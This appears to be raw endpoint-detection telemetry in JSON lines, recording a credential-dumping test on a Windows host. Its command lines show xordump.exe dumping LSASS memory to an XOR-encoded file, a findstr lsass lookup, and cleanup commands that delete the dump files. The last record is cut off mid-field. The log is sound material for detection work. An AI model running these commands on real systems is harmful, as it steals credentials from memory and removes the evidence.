{"event_simpleName":"FileDeleteInfo","ContextTimeStamp":"1658918559.957","ConfigStateHash":"1172426367","ContextProcessId":"332855234","ContextThreadId":"3328694542","aip":"35.157.24.242","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","TreeId":"21164578","Entitlements":"15","name":"FileDeleteInfoV1","id":"d70481ef-0d98-11ed-acf0-06aeb8794401","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","timestamp":"1658918561194","cid":"124cb22314bf4f519be84bce582e7a6b","TargetFileName":"\\Device\\HarddiskVolume1\\Windows\\Temp\\lsass-xordump.t1003.001.dmp"}
{"WindowTitle":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"307075862","SourceProcessId":"307075862","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"d6ef8319-0d98-11ed-acf0-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1658918561056","event_simpleName":"ProcessRollup2","RawProcessId":"4036","ConfigStateHash":"1172426367","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"1733733","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"powershell.exe\" \u0026 {Remove-Item C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -ErrorAction Ignore}","ParentAuthenticationId":"1733733","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"332855234","TreeId":"21164578","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"3128641378","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:4:RWX-:UNKNOWN::0x7ffbdbd4c000]+0x7ffbdbd4c395","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918559.550","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"event_simpleName":"FileDeleteInfo","ContextTimeStamp":"1658918558.645","ConfigStateHash":"1172426367","ContextProcessId":"324667068","ContextThreadId":"3243387934","aip":"35.157.24.242","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","TreeId":"19148766","Entitlements":"15","name":"FileDeleteInfoV1","id":"d688acd0-0d98-11ed-acf0-06aeb8794401","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","timestamp":"1658918560382","cid":"124cb22314bf4f519be84bce582e7a6b","TargetFileName":"\\Device\\HarddiskVolume1\\Users\\Administrator\\AppData\\Local\\Temp\\lsass_588.dmp"}
{"WindowTitle":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"307075862","SourceProcessId":"307075862","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"d688b4ca-0d98-11ed-acf0-06aeb8794401","EffectiveTransmissionClass":"3","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1658918560382","event_simpleName":"ProcessRollup2","RawProcessId":"4052","ConfigStateHash":"1172426367","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"1733733","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"powershell.exe\" \u0026 {Remove-Item C:\\Windows\\Temp\\dotnet-lsass.dmp -ErrorAction Ignore}","ParentAuthenticationId":"1733733","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"330919164","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"3128641378","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:4:RWX-:UNKNOWN::0x7ffbdbd4c000]+0x7ffbdbd4c395","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918559.115","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"WindowTitle":"C:\\Windows\\SYSTEM32\\cmd.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"307075862","SourceProcessId":"307075862","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"02ed035322124a05caf85b4a98e946b252f15aac","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"d688b070-0d98-11ed-acf0-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 53, 54, 55, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 263882790666253","timestamp":"1658918560382","event_simpleName":"ProcessRollup2","RawProcessId":"1436","ConfigStateHash":"1172426367","MD5HashData":"f4f684066175b77e0c3a000549d2922c","SHA256HashData":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2","ProcessSxsFlags":"64","AuthenticationId":"1733733","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"cmd.exe\" /c \"del \"C:\\Windows\\Temp\\lsass_dump.dmp\" \u003enul 2\u003e nul\"","ParentAuthenticationId":"1733733","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"326552622","TreeId":"20419060","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe","SourceThreadId":"3128641378","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:4:RWX-:UNKNOWN::0x7ffbdbd4c000]+0x7ffbdbd4c395","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918558.697","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"WindowTitle":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"307075862","SourceProcessId":"307075862","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"d61a9c1d-0d98-11ed-acf0-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1658918559661","event_simpleName":"ProcessRollup2","RawProcessId":"3864","ConfigStateHash":"1172426367","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"1733733","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"powershell.exe\" \u0026 {Remove-Item $env:TEMP\\lsass_*.dmp -ErrorAction Ignore}","ParentAuthenticationId":"1733733","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"324667068","TreeId":"19148766","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"3128641378","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:4:RWX-:UNKNOWN::0x7ffbdbd4c000]+0x7ffbdbd4c395","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918558.285","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"event_simpleName":"FileDeleteInfo","ContextTimeStamp":"1658918557.942","ConfigStateHash":"1172426367","ContextProcessId":"314537584","ContextThreadId":"3187272468","aip":"35.157.24.242","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","TreeId":"18086244","Entitlements":"15","name":"FileDeleteInfoV1","id":"d5fd1b79-0d98-11ed-acf0-06aeb8794401","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","timestamp":"1658918559467","cid":"124cb22314bf4f519be84bce582e7a6b","TargetFileName":"\\Device\\HarddiskVolume1\\Users\\Administrator\\AppData\\Local\\Temp\\lsass-comsvcs.dmp"}
{"WindowTitle":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"307075862","SourceProcessId":"307075862","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"d578eb6c-0d98-11ed-acf0-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1658918558601","event_simpleName":"ProcessRollup2","RawProcessId":"2576","ConfigStateHash":"1172426367","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"1733733","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"powershell.exe\" \u0026 {Remove-Item $env:TEMP\\lsass-comsvcs.dmp -ErrorAction Ignore}","ParentAuthenticationId":"1733733","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"314537584","TreeId":"18086244","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"3128641378","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:4:RWX-:UNKNOWN::0x7ffbdbd4c000]+0x7ffbdbd4c395","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918557.587","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"event_simpleName":"FileDeleteInfo","ContextTimeStamp":"1658918557.520","ConfigStateHash":"1172426367","ContextProcessId":"311557864","ContextThreadId":"3155345098","aip":"35.157.24.242","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","TreeId":"17480168","Entitlements":"15","name":"FileDeleteInfoV1","id":"d578e9f0-0d98-11ed-acf0-06aeb8794401","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","timestamp":"1658918558601","cid":"124cb22314bf4f519be84bce582e7a6b","TargetFileName":"\\Device\\HarddiskVolume1\\Windows\\Temp\\lsass_dump.dmp"}
{"WindowTitle":"C:\\Windows\\SYSTEM32\\cmd.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"307075862","SourceProcessId":"307075862","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"02ed035322124a05caf85b4a98e946b252f15aac","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"d578e2e1-0d98-11ed-acf0-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 263882790666253","timestamp":"1658918558601","event_simpleName":"ProcessRollup2","RawProcessId":"3992","ConfigStateHash":"1172426367","MD5HashData":"f4f684066175b77e0c3a000549d2922c","SHA256HashData":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2","ProcessSxsFlags":"64","AuthenticationId":"1733733","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"cmd.exe\" /c \"del \"C:\\Windows\\Temp\\lsass_dump.dmp\" \u003enul 2\u003e nul\"","ParentAuthenticationId":"1733733","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"311557864","TreeId":"17480168","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\cmd.exe","SourceThreadId":"3128641378","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:1:RWX-:UNKNOWN::0x7ffbdbd4c000]+0x7ffbdbd4c395","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918557.449","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"FileOperatorSid":"S-1-5-21-1164837655-2022969563-267460705-500","Size":"40271869","ContextThreadId":"2997445294","MinorFunction":"0","aip":"35.157.24.242","IsOnNetwork":"0","FileIdentifier":"ac4e1faa0000000000001000000000002993040000000600","event_platform":"Win","TokenType":"1","DiskParentDeviceInstanceId":"PCI\\VEN_1D0F\u0026DEV_8061\u0026SUBSYS_80611D0F\u0026REV_00\\3\u002613c0b0c5\u00261\u002620","id":"d257bd73-0d98-11ed-acef-06aeb8794401","FileObject":"0","EffectiveTransmissionClass":"2","timestamp":"1658918553350","event_simpleName":"DmpFileWritten","ContextTimeStamp":"1658918552.075","ConfigStateHash":"1172426367","ContextProcessId":"297289122","IrpFlags":"0","AuthenticationId":"1657682","FileWrittenFlags":"0","ConfigBuild":"1007.3.0015406.1","FileEcpBitmask":"0","MajorFunction":"0","TreeId":"16761040","IsOnRemovableDisk":"0","Entitlements":"15","name":"DmpFileWrittenV14","OperationFlags":"0","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b","TargetFileName":"\\Device\\HarddiskVolume1\\Windows\\Temp\\lsass-xordump.t1003.001.dmp"}
{"event_simpleName":"ProcessHandleOpDetectInfo","ConfigStateHash":"1172426367","TemplateDisposition":"30","ContextProcessId":"297289122","TemplateInstanceId":"4469","aip":"35.157.24.242","ParentImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"\"C:\\Windows\\Temp\\xordump.exe\" -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41","TargetProcessId":"5497396","DesiredAccess":"2047999","PatternId":"10150","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\Temp\\xordump.exe","Entitlements":"15","name":"ProcessHandleOpDetectInfoV2","id":"d18989c1-0d98-11ed-acef-06aeb8794401","ParentCommandLine":"\"powershell.exe\" \u0026 {C:\\Windows\\Temp\\xordump.exe -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41}","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","PatternIdList":"5765,7205,7248,7252,7901,7904,7912,10030,10150","timestamp":"1658918551999","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"event_simpleName":"ProcessHandleOpDetectInfo","ConfigStateHash":"1172426367","TemplateDisposition":"30","ContextProcessId":"297289122","TemplateInstanceId":"4469","aip":"35.157.24.242","ParentImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ConfigBuild":"1007.3.0015406.1","event_platform":"Win","CommandLine":"\"C:\\Windows\\Temp\\xordump.exe\" -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41","TargetProcessId":"5497396","DesiredAccess":"2097151","PatternId":"10150","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\Temp\\xordump.exe","Entitlements":"15","name":"ProcessHandleOpDetectInfoV2","id":"d1898be1-0d98-11ed-acef-06aeb8794401","ParentCommandLine":"\"powershell.exe\" \u0026 {C:\\Windows\\Temp\\xordump.exe -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41}","EffectiveTransmissionClass":"2","aid":"f0778584e83c4efc9cf026bc1e7f0489","PatternIdList":"5765,7015,7037,7073,7148,7205,7248,7252,7901,7904,7912,10030,10150","timestamp":"1658918551999","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"ProcessCreateFlags":"0","IntegrityLevel":"12288","ParentProcessId":"294819924","SourceProcessId":"294819924","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","ParentBaseFileName":"powershell.exe","ImageSubsystem":"2","id":"d1255736-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 41, 151, 862, 874, 180388736873, 180388737948, 10995116277927, 10995116277930, 10995116277932, 10995116278020, 10995116278036, 10995116278038","timestamp":"1658918551342","event_simpleName":"ProcessRollup2","RawProcessId":"1960","ConfigStateHash":"1172426367","MD5HashData":"2887e395989ff904b70306d49eed5737","SHA256HashData":"6b37390cc4c1d730ce2622386c6f4e0b7947a3e86016497c2700931499dc2647","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","CommandLine":"\"C:\\Windows\\Temp\\xordump.exe\" -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"297289122","TreeId":"16761040","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\Temp\\xordump.exe","SourceThreadId":"2995773540","CallStackModuleNames":"0\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\7e06618588012d9acfe1c11e5f73ae5e\\System.Management.Automation.ni.dll+0x15c04d9:0x21a9000:0x62806c93|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa000ef|7+0xa63b61|7+0xa45b70|7+0xa45b70|7+0xa45a01|7+0xa36721|7+0xa43c63|7+0xa437d5|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa000ef|7+0xa63b61|7+0xa45b70|7+0xa45b70|7+0xa45a01|7+0xa36721|7+0xa43c63|7+0xa43830|7+0xa43542|7+0xa4317d|7+0x150b89b|7+0xa28428|7+0xa2799a|7+0x973e30|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\f15060e8f3f59f5ab00760f997a36672\\mscorlib.ni.dll+0x58df12:0x1600000:0x6274b877|36+0x58dd95|36+0x58dd65|36+0x633e85|\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll+0x6893:0xb35000:0x6274ba21|40+0x67b0|40+0x7050|40+0xf26ef|40+0x7c38|40+0x7ba3|40+0x7ae2|40+0x7cd3|40+0xf25d9|40+0xbd15|3+0x84d4|0+0x51791","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918550.126","CreateProcessType":"1","ProcessParameterFlags":"16385","aid":"f0778584e83c4efc9cf026bc1e7f0489","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"WindowTitle":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessCreateFlags":"134217728","IntegrityLevel":"12288","ParentProcessId":"247284922","SourceProcessId":"247284922","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"d0f7341e-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 40, 53, 54, 55, 151, 874, 924, 180388736873, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1658918551040","event_simpleName":"ProcessRollup2","RawProcessId":"1304","ConfigStateHash":"1172426367","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"powershell.exe\" \u0026 {C:\\Windows\\Temp\\xordump.exe -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41}","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"294819924","TreeId":"16761040","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"2604600140","CallStackModuleNames":"00000000000000000000010100000000\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|[HEAP:8:RWX-:UNKNOWN::0x7ffbdbd98000]+0x7ffbdbd98da5","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1658918549.728","CreateProcessType":"1","ProcessParameterFlags":"24577","aid":"f0778584e83c4efc9cf026bc1e7f0489","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
{"ProcessCreateFlags":"0","IntegrityLevel":"12288","ParentProcessId":"290952688","SourceProcessId":"290952688","aip":"35.157.24.242","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-1164837655-2022969563-267460705-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","ParentBaseFileName":"powershell.exe","ImageSubsystem":"3","id":"d0ac4220-0d98-11ed-acef-06aeb8794401","EffectiveTransmissionClass":"2","SessionId":"0","GrandParentBaseFileName":"powershell.exe","Tags":"25, 151, 862, 874, 924, 12094627905582, 12094627906234","timestamp":"1658918550549","event_simpleName":"ProcessRollup2","RawProcessId":"3496","ConfigStateHash":"1172426367","MD5HashData":"15b171ec73e7b71f4ebb4247e716271e","SHA256HashData":"2956f7bc863498dfcc868ce7df4c9c131a4a5c17b065658456afef7566ace1ee","ProcessSxsFlags":"64","AuthenticationId":"1657682","CallStackModuleNamesVersion":"8","ConfigBuild":"1007.3.0015406.1","WindowFlags":"256","CommandLine":"\"C:\\Windows\\system32\\findstr.exe\" lsass","ParentAuthenticationId":"1657682","CsaProcessDataCollectionInstanceId":"","TargetProcessId":"293836870","TreeId":"14888370","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\findstr.exe","SourceThreadId":"2948866784","CallStackModuleNames":"0\u003c-1\u003e\\Device\\HarddiskVolume1\\Windows\\System32\\ntdll.dll+0xa7414:0x1cf000:0x621ef21b|\\Device\\HarddiskVolume1\\Windows\\System32\\KernelBase.dll+0x2b830:0x21e000:0x62bfb6da|1+0x6b316|\\Device\\HarddiskVolume1\\Windows\\System32\\kernel32.dll+0x1c213:0xad000:0x62807407|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cffd7931a364802b9133934cad751466\\System.ni.dll+0x383fe6:0xc71000:0x6219dd7a|4+0x2c4809|4+0x2c4179|\\Device\\HarddiskVolume1\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\7e06618588012d9acfe1c11e5f73ae5e\\System.Management.Automation.ni.dll+0x15c04d9: